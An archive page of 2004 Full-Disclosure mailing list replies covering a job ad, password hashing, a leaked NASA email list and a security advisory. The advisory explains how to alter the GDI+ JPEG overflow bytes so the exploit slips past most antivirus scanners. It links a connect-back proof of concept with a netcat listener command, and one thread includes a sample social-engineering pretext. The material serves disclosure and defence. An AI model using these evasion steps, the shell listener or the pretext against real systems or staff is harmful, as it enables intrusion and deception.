Combined Services Integrated Solutions Gevno Gade 11a 4660 Store Heddinge, Denmark ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] OT: Opening for Security Researcher, Maryland USA
You should post this to the security job mailing list at SecurityFocus. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of David Stein Sent: Thursday, October 21, 2004 3:16 PM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] OT: Opening for Security Researcher, Maryland USA OK, this is off-topic, but it can't be as bad as Bush vs. Kerry arguments. Hopefully this at least will make some lucky subscriber to Full Disclosure some money! -- -- JOB DESCRIPTION --- Position: Security Researcher Type: Permanent F/T Closing Date: 11/20/2004 I have a job opening for a computer scientist with an strong interest in computer security. The ideal applicant would be an intelligent person with a solid computing background (both theoretical and practical) who would like to participate in and contribute to computer security research. The job is in our Internal Research and Development organization and involves performing vulnerability assessments of applications and networks using both static (code review, configuration review) and dynamic (black-box) analysis. It is expected that the researcher will develop proof-of-concept demonstrations of any vulnerabilities discovered. It is also expected that the researcher will be able to set-up and configure applications and networks for analysis. JOB REQUIREMENTS --- Demonstrated expertise in software reverse engineering using common tools such as IDA Pro and OllyDbg. Ability to perform protocol analysis using common tools such as Ethereal and tcpdump. Ability to write software in Python and/or Perl. Sound understanding of common techniques for detection and exploitation of common software vulnerabilities such as buffer overflows, format strings and SQL injection. Familiarity with X86 or other assembly language. Experience with setup and configuration of Unix and/or Linux systems. Experience with hardware reverse engineering desirable. Experience with telecommunications systems helpful. Typically requires Masters or Bachelors degree in Computer Science or a related discipline with two years of experience or equivalent acquired knowledge through practical technical experience. U.S. Citizenship required. Applicants selected will be subject to a background investigation and must meet eligibility requirements for access to classified information. CONTACT --- If interested, go to http://www.gd-ais.com, select 'Careers', then 'GDAIS Careers', search openings for Req. Number 7371, and apply online. Or you can send your resume to me (ASCII only please). -- David Stein [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Will a vote for John Kerry be counted by a Hart InterCivic eSlate3000 in Honolulu?
I second that, do we hear a third? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of KF_lists Sent: Thursday, October 21, 2004 1:36 PM To: [EMAIL PROTECTED] [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Will a vote for John Kerry be counted by a Hart InterCivic eSlate3000 in Honolulu? Support Apathy! I don't give a shit... do you? Until you are debating over who has the best malloc() ninjitsu technique or which on of them can exploit a shatter attack, QUIT discussing the candidates! -KF The question comes to mind... why oh why did you cast your vote for Kerry? I guess you want the US to be policed and governed by the UN. I guess you want someone in office that can't make up his mind about anything. I guess you want someone in office that will start to shred the Constitution piece by piece and change it bit by bit until it reads like the Heinz Ketchup bottle ingrediants. But, it's your vote, you can vote for anyone that you wish, I'll defend that right to the end, even if Kerry wants to take it away My vote will be PROUDLY cast for Bush, just like it was 4 years ago. Exibar ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Senior M$ member says stop using passwords completely!
Changing it is a option, but that is true for any password cracking. But of course changing the password makes your presence really known. -Original Message- From: Aviv Raff [mailto:[EMAIL PROTECTED] Sent: Wednesday, October 20, 2004 1:16 AM To: Todd Towles; 'Pavel Kankovsky'; [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] Senior M$ member says stop using passwords completely! If they crack it, they might be able to automatically change the password to a readable one. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Todd Towles Sent: Tuesday, October 19, 2004 10:42 PM To: Pavel Kankovsky; [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] Senior M$ member says stop using passwords completely! I was under the understand that passwords of over 14 characters were stored with a more secure hash, therefore 14 characters passwords were harder to crack, due to the more secure hash. Windows will create two different hashes for passwords shorting than 14 characters, I do believe. Just use a non-printable character in your password and cracking is useless...if they crack it, they can't read what they cracked. ;) -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Pavel Kankovsky Sent: Sunday, October 17, 2004 2:21 PM To: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Senior M$ member says stop using passwords completely! On Sat, 16 Oct 2004, Frank Knobbe wrote: It's a nice recommendation of MS to make (to use long passphrases instead of passwords). But I don't consider 14 chars a passphrase. Perhaps they should enable more/all password components to handle much longer passwords/phrases. A passphrase consisting of 7 words and 12 bits of entropy per a word is as guessable as a password with 14 characters and 6 bits of entropy per a character. You get 84 bits of total entropy in both cases. The only advantage of passphrases is that lusers might find long random sequences of words easier to remember than long random sequences of characters. (But wait: 12 bits of entropy per a word--this is equivalent to a uniform choice of one word out of 4096. 4 thousand? That might exceed an average luser's vocabulary by an order of magnitude! ;) --Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ] Resistance is futile. Open your source code and prepare for assimilation. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ## ## # This Mail Was Scanned by 012.net Anti Virus Service - Powered by TrendMicro Interscan ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] interesting trojan found
Yep PEBuilder will allow you to make a Windows XP/2003 live boot up CD. I also believe Knoppix 3.4 will allow you to write on NTFS once you can the permission on the mount to write and read. It mounts with Read-only by default for security of course. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Danny Sent: Wednesday, October 20, 2004 1:10 PM To: Richard Stevens Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] interesting trojan found On Wed, 20 Oct 2004 17:51:26 +0100, Richard Stevens [EMAIL PROTECTED] wrote: b: anyone know a free boot disk that both reads writes to NTFS, so I can delete it! If you have a CD-ROM, http://www.nu2.nu/pebuilder/. ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] why o why did NASA do this.
I meant this outdated NASA e-mail list. I undestand that FD could be used for this purpose. The fact that NASA just hands you this information (outdated or not) is pretty sad. As I stated before it is free information leakage at best and because it is outdated it should be removed from public view. This could be used for social attacks and e-mail attacks. I don't think SPAMmers care about some 6 year old list but hackers would. Any information that they can get free of charge is just that much better. You know me better than that GuidoZ .lol -Original Message- From: GuidoZ [mailto:[EMAIL PROTECTED] Sent: Tuesday, October 19, 2004 1:24 AM To: Todd Towles Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] why o why did NASA do this. how would this list help me spam? Google your email address - then simply use a bot to gather ALL the email addresses listed in the posts along with it. ;) The sad fact is that the email addresses used to post to this list (and any others like it) are freely there for the taking. Plus, it's quite obvious they are active. (More obvious then, say, email addies fro 1996?) ;) -- Peace. ~G On Mon, 18 Oct 2004 11:02:00 -0500, Todd Towles [EMAIL PROTECTED] wrote: Exactly as I stated eariler...this is just information leakage...old as it might be, it helps...the people on the list are just doing their jobs...getting paid and giving information to a employee that knows their name (and is higher in the company) seems harmless. Spam isn't the issue with this information leakage, I can buy a CD with 6 million e-mail address on it...how would this list help me spam? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of KF_lists Sent: Monday, October 18, 2004 9:06 AM To: Harry de Grote Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] why o why did NASA do this. Forget about the spammers, how about social engineers. This is quite the gold mine for that. Hi this is Joe Schmoe from building 69 I need to have my password reset. -KF i have to admit... it's pretty old and useless, but i think this may be a nice place for spammers to try out some new adresses... ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] why o why did NASA do this.
GuidoZ wrote: =) Yeah, I do. I wasn't sure if you were having a brain fart or something. lol Ok Mr. Limpy..lol Well said. It was finally removed from public view, though I'd imagine quite a few saved it just in case (myself included). No, it's not some perfect list for every malicious purpose, though it's certainly better then nothing. Spammers really don't care if it's active or not - they will still sell it. Social Engineering can go a long way though. It's entirely possible someone that worked at NASA in 1996 would be there still today. It's called a career. =) Great point about the career job. Even if they aren't there, knowing a time and a name can get you more information out of a person in another dept, I think. I wouldn't try =) -Todd -- Peace. ~G On Tue, 19 Oct 2004 07:59:36 -0500, Todd Towles [EMAIL PROTECTED] wrote: I meant this outdated NASA e-mail list. I undestand that FD could be used for this purpose. The fact that NASA just hands you this information (outdated or not) is pretty sad. As I stated before it is free information leakage at best and because it is outdated it should be removed from public view. This could be used for social attacks and e-mail attacks. I don't think SPAMmers care about some 6 year old list but hackers would. Any information that they can get free of charge is just that much better. You know me better than that GuidoZ .lol -Original Message- From: GuidoZ [mailto:[EMAIL PROTECTED] Sent: Tuesday, October 19, 2004 1:24 AM To: Todd Towles Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] why o why did NASA do this. how would this list help me spam? Google your email address - then simply use a bot to gather ALL the email addresses listed in the posts along with it. ;) The sad fact is that the email addresses used to post to this list (and any others like it) are freely there for the taking. Plus, it's quite obvious they are active. (More obvious then, say, email addies fro 1996?) ;) -- Peace. ~G On Mon, 18 Oct 2004 11:02:00 -0500, Todd Towles [EMAIL PROTECTED] wrote: Exactly as I stated eariler...this is just information leakage...old as it might be, it helps...the people on the list are just doing their jobs...getting paid and giving information to a employee that knows their name (and is higher in the company) seems harmless. Spam isn't the issue with this information leakage, I can buy a CD with 6 million e-mail address on it...how would this list help me spam? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of KF_lists Sent: Monday, October 18, 2004 9:06 AM To: Harry de Grote Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] why o why did NASA do this. Forget about the spammers, how about social engineers. This is quite the gold mine for that. Hi this is Joe Schmoe from building 69 I need to have my password reset. -KF i have to admit... it's pretty old and useless, but i think this may be a nice place for spammers to try out some new adresses... ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Windows Time Synchronization - Best Practices
As everyone knows, there is very little that is OT on FD...so if you don't have anything nice to sayshhh! lol From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Richard StevensSent: Tuesday, October 19, 2004 12:22 PMTo: Bernardo Santos Wernesback; [EMAIL PROTECTED]Subject: RE: [Full-Disclosure] Windows Time Synchronization - Best Practices Why FD? What is the direct security implications of this? I'm sure someone can construct a rather tenuous link, but really -Original Message-From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]On Behalf Of Bernardo Santos WernesbackSent: 19 October 2004 16:05To: [EMAIL PROTECTED]Subject: [Full-Disclosure] Windows Time Synchronization - Best Practices Hello everyone, I was wondering if anyone has or could point me to some sort of paper describing best-practices related to time synchronization and the configuration of daylight savings. Basically my problem is deciding if I should or shouldn't use Windows' option to autoconfigure daylight savings but I'd like to see recommendations from known companies. I am also open to suggestions from the Full-disclosure community but my recommendations have to be justified to my boss ;) Thanks for any pointers! See ya, Bernardo Santos Wernesback [EMAIL PROTECTED]
RE: [Full-Disclosure] Senior M$ member says stop using passwords completely!
I was under the understand that passwords of over 14 characters were stored with a more secure hash, therefore 14 characters passwords were harder to crack, due to the more secure hash. Windows will create two different hashes for passwords shorting than 14 characters, I do believe. Just use a non-printable character in your password and cracking is useless...if they crack it, they can't read what they cracked. ;) -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Pavel Kankovsky Sent: Sunday, October 17, 2004 2:21 PM To: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Senior M$ member says stop using passwords completely! On Sat, 16 Oct 2004, Frank Knobbe wrote: It's a nice recommendation of MS to make (to use long passphrases instead of passwords). But I don't consider 14 chars a passphrase. Perhaps they should enable more/all password components to handle much longer passwords/phrases. A passphrase consisting of 7 words and 12 bits of entropy per a word is as guessable as a password with 14 characters and 6 bits of entropy per a character. You get 84 bits of total entropy in both cases. The only advantage of passphrases is that lusers might find long random sequences of words easier to remember than long random sequences of characters. (But wait: 12 bits of entropy per a word--this is equivalent to a uniform choice of one word out of 4096. 4 thousand? That might exceed an average luser's vocabulary by an order of magnitude! ;) --Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ] Resistance is futile. Open your source code and prepare for assimilation. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Full-Disclosure Posts
Well, I didn't take offense...alot of compaines are very lazy with security...just wanted to throw in my 2 cents. Just look at all the pen-testing compaines..that throw you a nessus report with a logo on top of it. They have never tested the reported hole with another method or even tried any other hacking method (social). Don't worry I see your point too clear. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of [EMAIL PROTECTED] Sent: Sunday, October 17, 2004 2:54 PM To: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Full-Disclosure Posts On Sun, 17 Oct 2004 12:34:33 -0500, Todd Towles [EMAIL PROTECTED] wrote: I agree with your idea, but I am one of those uni graduate/20 something professionals. I am very passion about my work and the security of the company I work for. I work in a rural state and the money isn't as high as some other places. I took a pay cut to work in the IT field when I finished college. Maybe you weren't talking about people like myself in your statement (since most people that are part of FD are here to be on the edge of security and around people that understand them) but it seemed like you were talking in pretty general termswith that in mind I have to disagree with you that all the 20 something professionals are not good security professionals. A lot of the older folks are sitting in the corner talking about their 1980 modems, while some 15 year old from south amercian uses a three year old exploit on their misconfigured Apache webserver and defaces it. I agree that you have to love computers...you have to eat and sleep computers/security to be good in the field and a lot of people in the IT field aren't like that. Kinda sad, but I will have their job one day..so..I just smile. My motivation is yahoo.. these guys need to wake up more. Everything about them says they are out of touch with the threats of today. If you report X, they patch X, even if they know Y and Z are vulnerable, the apparent attitude is to leave Y and Z until they get reported or become an active problem, because they want to move onto the next reported vulnerability. From the idea I get, its all about what looks good on paper and productivity. I mean, I bet yahoo hand out most productive security employee of the month awards and stuff. Its all screwed up and wrong. My stance is.. yahoo sack all the ones who are in it for the money, keep the employees who think like a hacker, then recruit some real life hackers from the underground. That combination is a winning security team, not the current team who in my opinion are out of touch and out dated for the threats of the 21st century. As for misconfigured web servers with 3 year old exploit. Yahoo! don't even need exploits and misconfigured web servers. They do fine by cutting corners and taking short cuts in security. Half the network is vulnerable to all manner of stuff. In my opinion, the only threat to Yahoo are Yahoo themselves, not hackers. Sorry to go on about yahoo, but its something i'm passionate about. Feel free to hit the block sender button, I fully understand. :-) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] why o why did NASA do this.
Exactly as I stated eariler...this is just information leakage...old as it might be, it helps...the people on the list are just doing their jobs...getting paid and giving information to a employee that knows their name (and is higher in the company) seems harmless. Spam isn't the issue with this information leakage, I can buy a CD with 6 million e-mail address on it...how would this list help me spam? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of KF_lists Sent: Monday, October 18, 2004 9:06 AM To: Harry de Grote Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] why o why did NASA do this. Forget about the spammers, how about social engineers. This is quite the gold mine for that. Hi this is Joe Schmoe from building 69 I need to have my password reset. -KF i have to admit... it's pretty old and useless, but i think this may be a nice place for spammers to try out some new adresses... ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Full-Disclosure Posts
I agree with your idea, but I am one of those uni graduate/20 something professionals. I am very passion about my work and the security of the company I work for. I work in a rural state and the money isn't as high as some other places. I took a pay cut to work in the IT field when I finished college. Maybe you weren't talking about people like myself in your statement (since most people that are part of FD are here to be on the edge of security and around people that understand them) but it seemed like you were talking in pretty general termswith that in mind I have to disagree with you that all the 20 something professionals are not good security professionals. A lot of the older folks are sitting in the corner talking about their 1980 modems, while some 15 year old from south amercian uses a three year old exploit on their misconfigured Apache webserver and defaces it. I agree that you have to love computers...you have to eat and sleep computers/security to be good in the field and a lot of people in the IT field aren't like that. Kinda sad, but I will have their job one day..so..I just smile. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of [EMAIL PROTECTED] Sent: Sunday, October 17, 2004 7:58 AM To: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Full-Disclosure Posts On Sat, 16 Oct 2004 19:13:18 -0700, Etaoin Shrdlu [EMAIL PROTECTED] wrote: Of course, anyone still using the term hax0r as though it were meaningful might want to think further about what a security professional might be A security professional is someone who cares more about money than the real issue of security at where they work. They don't go the extra mile for the interests of security at where they work, as they don't want to risk the job they're in. My view is corporations should not employ uni graduates and thirty-somethings to work in a security team. They very likely still can't open a can of beans and certainly have no idea about the real issues which face them. They follow company policy and go home at the end of the day, and switch off. The people who should be working at a security team should be volunteers who have the real interests of the company in mind, instead of money. The security professional as we know it (uni graduate and 30 something) is not a hax0r, they are ph.d or whatever who are skilled on an academic level, and thats as far as it goes, which in my opinion isn't far enough. Being a security professional is ment to be about passion, strictly not money, in my humble opinion. Stop employing academics and get the hackers in to do the job properly, unpaid of course, at least to start off with, to make sure they're joining the company for the right reasons. ;-) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] why o why did NASA do this.
Oh yeah..I am sure if you called and pretended to be someone, they would ask for your ID number? If you believe that any company (including NASA) has all their employees in a security mind frame then you haven't tried. You could start to piece together all types of information. This is information leakage that isn't needed. They might as well all send us a e-mail with their internet connected IP address. The information is out there but to offer this in this way is just lazy. Anyone want to start putting a phone list for these people together? ;) My 2 cents. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Adam Jones Sent: Sunday, October 17, 2004 9:18 AM To: Andrew Smith Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] why o why did NASA do this. The majority of the list had nothing more than alias $name $email Only small parts had any more specific contact information. The emails provided seem to all have been @nasa.gov anyways. (did not actually search for exceptions on this other than eyeballing it) Most likely any mail sent to these addresses would be filtered, especially spam. It probably is not much of a security risk as calling them to say I am Brantly Hanks, Deputy Chief Engineer would get a response of Ok, give me your employeeID number to verify you. At the same time handing all of this out to everyone and anyone is just making that much more work for yourself. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Bypass of Antivirus software with GDI+ bug exploit Mutations
TrendMicro sees it as a MS04-028 exploit -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Andrey Bayora Sent: Thursday, October 14, 2004 2:46 AM To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: [Full-Disclosure] Bypass of Antivirus software with GDI+ bug exploit Mutations Bypass of Antivirus software with GDI+ bug exploit Mutations. HiddenBit.org Security Advisory. Date: October 14, 2004 Author: Andrey Bayora BACKGROUND While performing research paper for SANS GCIH practice I have found this issue and it seems to me enough critical to warn readers about this. DESCRIPTION Most Antivirus software can't detect Mutations of GDI+ exploit. ANALYSIS 1) Most Antivirus vendors issues virus definitions for known exploit code [1] witch uses \xFF\xFE\x00\x01 string for buffer overflow. From the Snort rule [2] you can learn that there are 7 more variants to produce this buffer overflow in GDI+. So, by changing \xFE to one of this - \xE1, \xE2, \xED and\or by changing \x01 to \x00 this exploit will be UNDETECTED by many antiviruses (list attached). 2) While original exploit code use buffer overflow string near the BEGINNING of the image file (after \xFF\xE0 , \xFF\xEC and \xFF\xEE markers), I was able to create image with buffer overflow string at the MIDDLE of the file. 3) By combining various strings from methods described under 1) and 2) and by placing them in different locations in the image file I was able to bypass various antivirus products. FIX 1) Patch vulnerable systems. 2) If your antivirus didn't detect these variants - block JPEG (xFFD8). DEMO http://www.hiddenbit.org/demo_files/jpeg.zip 1) In the 1.jpg file the \xFE string was substituted to \xE1. WARNING ! THIS IS COMPILED PROOF OF CONCEPT FROM [1] THAT WILL CONNECT BACK TO VULNERABLE MACHINE TO 127.0.0.1 AT PORT 777 ( run: nc -l -p 777 ). 2) In the 2.jpg the buffer overflow string at offset x22F0 (string that begins with \xFF\xED). THIS IS JUST AN IMAGE WITH BUFFER OVERFLOW. 3) This is results from [3] : For 1.jpg Results of a file scan This is the report of the scanning done over 1.jpg (see Demo section) file that VirusTotal processed on 10/13/2004 at 18:54:56. Antivirus Version Update Result BitDefender 7.010.12.2004 - ClamWin devel-20040922 10.12.2004 - eTrust-Iris 7.1.194.0 10.13.2004 - F-Prot 3.15b 10.13.2004 - Kaspersky 4.0.2.24 10.13.2004 - McAfee 439810.13.2004 Exploit-MS04-028 NOD32v2 1.893 10.13.2004 - Norman 5.70.10 10.12.2004 - Panda 7.02.00 10.13.2004 - Sybari 7.5.131410.13.2004 - Symantec 8.0 10.12.2004 Backdoor.Roxe TrendMicro 7.000 10.12.2004 Exploit-MS04-028 For 2.jpg Results of a file scan This is the report of the scanning done over 2.jpg file that VirusTotal processed on 10/13/2004 at 18:56:32. Antivirus Version Update Result BitDefender 7.010.12.2004 - ClamWin devel-20040922 10.12.2004 - eTrust-Iris 7.1.194.0 10.13.2004 - F-Prot 3.15b 10.13.2004 - Kaspersky 4.0.2.24 10.13.2004 - McAfee 439810.13.2004 Exploit-MS04-028 NOD32v2 1.893 10.13.2004 - Norman 5.70.10 10.12.2004 - Panda 7.02.00 10.13.2004 - Sybari 7.5.131410.13.2004 - Symantec 8.0 10.12.2004 Bloodhound.Exploit.13 TrendMicro 7.000 10.12.2004 Exploit-MS04-028 Only The BIG 3 was able to detect those variants. More complete research will be published in my SANS GCIH paper. Reference : [1] www.k-otik.com [2] http://www.snort.org/snort-db/sid.html?sid=2705 [3] www.virustotal.com ** HiddenBit.org is non-profit Israel security research team. -- Disclaimer The information within this advisory may change without notice. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatever arising out or in connection with the use or spread of this information. Any use of this information is at the user's own risk. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Bypass of Antivirus software with GDI+ bug exploit Mutations
Yep, sorry about that. Sophos isn't on VirusTotals list...anyone running it? -Original Message- From: Cassidy Macfarlane [mailto:[EMAIL PROTECTED] Sent: Thursday, October 14, 2004 10:42 AM To: Todd Towles; Andrey Bayora; [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] Bypass of Antivirus software with GDI+ bug exploit Mutations Symantec Enterprise 8.1: Your attachment JPEG.zip contained viruses: Backdoor.Roxe at location 1.jpg, and Bloodhound.Exploit.13 at location 2.jpg. -Original Message- From: Todd Towles [mailto:[EMAIL PROTECTED] Sent: 14 October 2004 14:10 To: Andrey Bayora; [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] Bypass of Antivirus software with GDI+ bug exploit Mutations TrendMicro sees it as a MS04-028 exploit -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Andrey Bayora Sent: Thursday, October 14, 2004 2:46 AM To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: [Full-Disclosure] Bypass of Antivirus software with GDI+ bug exploit Mutations Bypass of Antivirus software with GDI+ bug exploit Mutations. HiddenBit.org Security Advisory. Date: October 14, 2004 Author: Andrey Bayora BACKGROUND While performing research paper for SANS GCIH practice I have found this issue and it seems to me enough critical to warn readers about this. DESCRIPTION Most Antivirus software can't detect Mutations of GDI+ exploit. ANALYSIS 1) Most Antivirus vendors issues virus definitions for known exploit code [1] witch uses \xFF\xFE\x00\x01 string for buffer overflow. From the Snort rule [2] you can learn that there are 7 more variants to produce this buffer overflow in GDI+. So, by changing \xFE to one of this - \xE1, \xE2, \xED and\or by changing \x01 to \x00 this exploit will be UNDETECTED by many antiviruses (list attached). 2) While original exploit code use buffer overflow string near the BEGINNING of the image file (after \xFF\xE0 , \xFF\xEC and \xFF\xEE markers), I was able to create image with buffer overflow string at the MIDDLE of the file. 3) By combining various strings from methods described under 1) and 2) and by placing them in different locations in the image file I was able to bypass various antivirus products. FIX 1) Patch vulnerable systems. 2) If your antivirus didn't detect these variants - block JPEG (xFFD8). DEMO http://www.hiddenbit.org/demo_files/jpeg.zip 1) In the 1.jpg file the \xFE string was substituted to \xE1. WARNING ! THIS IS COMPILED PROOF OF CONCEPT FROM [1] THAT WILL CONNECT BACK TO VULNERABLE MACHINE TO 127.0.0.1 AT PORT 777 ( run: nc -l -p 777 ). 2) In the 2.jpg the buffer overflow string at offset x22F0 (string that begins with \xFF\xED). THIS IS JUST AN IMAGE WITH BUFFER OVERFLOW. 3) This is results from [3] : For 1.jpg Results of a file scan This is the report of the scanning done over 1.jpg (see Demo section) file that VirusTotal processed on 10/13/2004 at 18:54:56. Antivirus Version Update Result BitDefender 7.010.12.2004 - ClamWin devel-20040922 10.12.2004 - eTrust-Iris 7.1.194.0 10.13.2004 - F-Prot 3.15b 10.13.2004 - Kaspersky 4.0.2.24 10.13.2004 - McAfee 439810.13.2004 Exploit-MS04-028 NOD32v2 1.893 10.13.2004 - Norman 5.70.10 10.12.2004 - Panda 7.02.00 10.13.2004 - Sybari 7.5.131410.13.2004 - Symantec 8.0 10.12.2004 Backdoor.Roxe TrendMicro 7.000 10.12.2004 Exploit-MS04-028 For 2.jpg Results of a file scan This is the report of the scanning done over 2.jpg file that VirusTotal processed on 10/13/2004 at 18:56:32. Antivirus Version Update Result BitDefender 7.010.12.2004 - ClamWin devel-20040922 10.12.2004 - eTrust-Iris 7.1.194.0 10.13.2004 - F-Prot 3.15b 10.13.2004 - Kaspersky 4.0.2.24 10.13.2004 - McAfee 439810.13.2004 Exploit-MS04-028 NOD32v2 1.893 10.13.2004 - Norman 5.70.10 10.12.2004 - Panda 7.02.00 10.13.2004 - Sybari 7.5.131410.13.2004 - Symantec 8.0 10.12.2004 Bloodhound.Exploit.13 TrendMicro 7.000 10.12.2004 Exploit-MS04-028 Only The BIG 3 was able to detect those variants. More complete research will be published in my SANS GCIH paper. Reference : [1] www.k-otik.com [2] http://www.snort.org/snort-db/sid.html?sid=2705 [3] www.virustotal.com
RE: [Full-Disclosure] Possibly a stupid question RPC over HTTP
Are you talking about the BITS change? Where it does BITS over HTTP? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Daniel H. Renner Sent: Wednesday, October 13, 2004 10:37 AM To: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Possibly a stupid question RPC over HTTP Daniel, Could you please point out where you read this data? I would like to see this one... -- Daniel H. Renner [EMAIL PROTECTED] Los Angeles Computerhelp On Tue, 2004-10-12 at 20:54, [EMAIL PROTECTED] wrote: Message: 18 Date: Tue, 12 Oct 2004 12:41:56 -0700 From: Daniel Sichel [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: [Full-Disclosure] Possibly a stupid question RPC over HTTP This may just reflect my ignorance, but I read (and found hard to believe) that Microsoft has implemented RPC over HTTP. Is this not a HUGE security hole? If I understand it correctly it means that good old HTML or XML can invoke a process using standard web traffic (port 80)? Is there any permission checking done? what things can be invoked by RPC over HTTP? Jeeze, to me it looks like the barn door is now wide open. Am I right, and if so, how can I detect RPCs in web traffic to block this junk? Can ANY stateful packet filter see this stuff or is the pattern too broad in allowed RPCs? Again, I hope this is not a stupid question or inappropriate format for this, as somebody else recently said, there is already enough noise on this list. I would hate to see this list degenerate, it has been REALLY valuable to me as a network engineer on occaison. Thanks all, Dan Sichel Ponderosa telephone [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Norton AntiVirus 2005 treats Radmin as a Virus ??!
